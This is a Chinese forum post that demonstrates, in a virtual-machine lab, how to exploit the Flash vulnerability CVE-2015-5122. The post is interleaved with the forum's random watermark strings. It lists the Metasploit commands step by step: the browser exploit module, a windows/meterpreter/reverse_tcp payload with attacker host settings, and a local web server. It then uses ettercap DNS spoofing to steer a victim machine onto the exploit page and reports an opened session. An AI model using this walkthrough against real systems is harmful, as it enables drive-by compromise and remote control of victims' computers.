找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1580|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

* J* [! s2 b7 _ 二、cve2015-5122漏洞实例演示虚拟机 * {* [8 b$ H! o) w$ z5 W

2 Z q( m: b: |' f+ K

. {$ x6 g) r: X# W" ]   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: / b3 \ } ^+ B: E

( k1 J2 x( O8 w$ _8 g) X$ }0 S) g

3 i# {* F F0 L, K8 d search cve-2015-5122如图: 1 S- F& E a" u, @, ?/ w/ K

1 ?. H) f, J: U2 }4 w/ x4 @

' _# f1 }6 o7 U/ o$ Q6 o! ~   + R0 b0 t o/ O `& j

$ C$ x5 {3 t; a$ c' ~( f

9 T7 h& i0 f% [7 F* k2 s) } 下面我们敲如下命令: ) V. n' x9 i$ b7 y( u! H

6 C M' I$ U/ q* X% Y* `

6 U/ c/ G& V2 U, V& n8 W& H% D use exploit/multi/browser/adobe_flash_opaque_background_uaf ' [, z3 J# @! r) l

, c; y) D! O3 e" O4 w

8 U8 m2 o+ @( r8 r set PAYLOAD windows/meterpreter/reverse_tcp 2 s6 w$ h) n2 D& h4 X

* z; U/ b% X% G! @( o1 e: \+ Q2 o

: t# f# E3 B$ p B6 P; [ set LHOST 192.168.0.109 + P+ ~2 J1 V! B) w% j

, I- d3 h3 p, D( L4 i$ A

7 f1 n. |$ f! v: U0 x. a set URIPATH /                        /*根目录*/ ; s# A3 y' M* U( R* n# [ j1 W/ A$ J

+ z) m, `. C2 K9 V; l* T

7 O1 C8 K$ L; o O! Z set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 ' i5 I! h) ?& [( V7 J) p7 p

2 Q6 C+ p# ~- Y8 y% w3 Q1 ]

7 O R7 r/ ^8 X set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 6 l+ Q$ C8 k* a9 W: X( U/ O. Y

1 g1 t3 L6 H; b: h+ _% F# O( e* |

' `& s2 p1 ]& l' P 然后show options如图: 7 z0 t0 {* B! r* X3 L! F; |

" L0 v/ w7 t8 [. u k

$ j3 R8 r) M1 |. Q% {( @   2 B p: `. Q# {/ V7 b |

0 {+ v/ Y/ z& e$ L) p; l4 h; S

3 |6 E G( p* q$ v9 Y3 P 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
* i# x2 |0 Y% E, e9 C3 A- }
: l. ?+ g& T; v3 U3 A1 h( c

: D) b6 `. `* q

- h! P W |3 |" ?: U3 M7 ]0 M+ ` 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 * `' c2 h8 m' d

: |3 Z$ u6 d! h2 |7 y* }: q

$ T( U6 ~' I+ X Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 3 z4 E# R* H- g' ]" n2 k

, p2 _9 g3 P5 N8 w, a

4 U/ r6 v* G( D* K( M ?! J* F   ) h! X0 C" c. O

. i7 M2 O. i, g0 n/ I) K( I

, ^: {5 H0 U! T- W' ~( o. m& L 成功了,这时候我们断开ettercap,如图: 8 q& h: U; p/ `

$ D! h* ?( t: s1 X6 r" O

. j+ Y" m% r7 G$ L   $ l3 H; L. q- r; N5 C6 r3 x

1 i0 x) F' S/ T0 M) o9 O

" g3 n2 @- f8 [% b; V0 Z Screenshot如图: 6 s6 D) ?/ h( r, Q U

) G1 |( f: h0 m& H9 i; ~* P" U

# C; d( D U& v* L" W+ C   ; ~8 @+ g( }/ a7 ]: w+ u0 m

; S0 B. C5 S) T" I

2 n$ I- Z6 J3 ^2 ?) ` 2 K0 Q6 ^; R) `, H! R9 _; }

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表